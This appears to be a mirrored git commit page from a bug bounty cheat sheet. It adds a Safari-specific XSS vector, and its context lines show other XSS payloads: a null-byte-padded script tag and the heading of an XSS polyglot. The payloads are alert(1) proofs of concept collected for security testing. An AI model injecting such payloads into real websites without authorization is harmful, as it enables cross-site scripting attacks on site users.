mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-24 20:13:06 +00:00
Add Safari XSS Vector by @mramydnei
This commit is contained in:
parent
eff422e763
commit
8b34edd05b
1 changed files with 6 additions and 0 deletions
|
@ -26,6 +26,12 @@
|
|||
<x>%00%00%00%00%00%00%00<script>alert(1)</script>
|
||||
```
|
||||
|
||||
**Safari XSS Vector** by [@mramydnei](https://twitter.com/mramydnei/status/902470271327551489)
|
||||
|
||||
```html
|
||||
<script>location.href;'javascript:alert%281%29'</script>
|
||||
```
|
||||
|
||||
**XSS Polyglot** by [Ahmed Elsobky](https://github.com/0xSobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
|
||||
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue